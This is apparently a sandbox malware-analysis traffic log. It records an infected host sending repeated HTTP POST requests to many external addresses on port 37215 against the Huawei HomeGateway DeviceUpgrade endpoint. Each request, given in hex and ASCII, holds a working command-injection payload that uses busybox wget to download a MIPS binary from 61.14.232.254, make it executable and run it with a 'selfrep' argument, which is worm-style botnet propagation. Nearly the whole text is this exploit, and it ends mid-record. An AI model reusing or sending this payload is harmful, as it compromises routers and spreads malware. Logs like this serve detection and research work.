                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  361192.168.2.134683824.89.124.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231262922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  362192.168.2.1345112197.51.13.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231276989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  363192.168.2.1357272197.118.105.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231300116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  364192.168.2.1334798157.192.46.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231317997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  365192.168.2.1359754143.127.205.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231338978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  366192.168.2.1360046182.16.29.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231362104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  367192.168.2.134265241.59.67.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231384993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  368192.168.2.1344468146.111.17.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231400967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  369192.168.2.135072441.118.254.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231426954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  370192.168.2.1349016157.60.9.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231443882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 